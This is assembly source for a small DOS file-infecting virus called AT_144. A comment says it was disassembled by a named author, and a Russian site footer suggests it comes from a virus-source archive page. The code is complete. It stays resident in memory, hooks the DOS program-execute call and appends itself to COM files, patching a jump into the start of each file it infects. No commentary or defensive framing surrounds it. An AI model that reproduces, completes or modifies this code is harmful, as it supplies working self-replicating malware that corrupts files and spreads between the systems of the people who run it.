AT_144

; --------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
; --------------------------------------------------------------------------

.model tiny
.286
.code
org 100h

start:
db 0e9h,02,0

Host_File:
int 21h

Virus_Entry:
pusha
mov di,si
call Get_Displacement

Get_Displacement:
pop si
add si,31h
movsb
movsw

mov ax,24h
mov es,ax
xor di,di
sub si,3Ah
cmp byte ptr es:[di],60h
mov cl,90h
rep movsb

jz Done_Install
mov ds,cx
mov si,84h
movsw
movsw
mov word ptr [si-4],3Ah
mov [si-2],ax
push cs
pop ds

Done_Install:
push cs
pop es
popa
jmp si
Jump_Byte db 0e9h
Storage_Bytes:
mov ax,4c00h

Int_21_Handler:
pusha
push ds
xor ah,4Bh
jnz Exit_Handler
mov ax,3D02h
int 0B4h
jc Exit_Handler
mov bx,ax
push cs
pop ds
mov ah,3Fh
mov cx,3
mov dx,37h
mov si,dx
int 0B4h
cmp byte ptr [si],4Dh
je Close_File
mov ax,4202h
xor cx,cx
xor dx,dx
int 0B4h
sub al,3
mov bp,ax
mov cl,90h
sub ax,cx
cmp ax,[si+1]
je Close_File
mov ah,40h
int 0B4h
mov ax,4200h
xor cx,cx
int 0B4h
mov ah,40h
lea dx,[si-1]
mov cl,3
mov [si],bp
int 0B4h

Close_File:
mov ah,3Eh
int 0B4h
Exit_Handler:
pop ds
popa
db 0EAh
end_virus:
end start

На главную :: На уровень вверх :: Карта сайта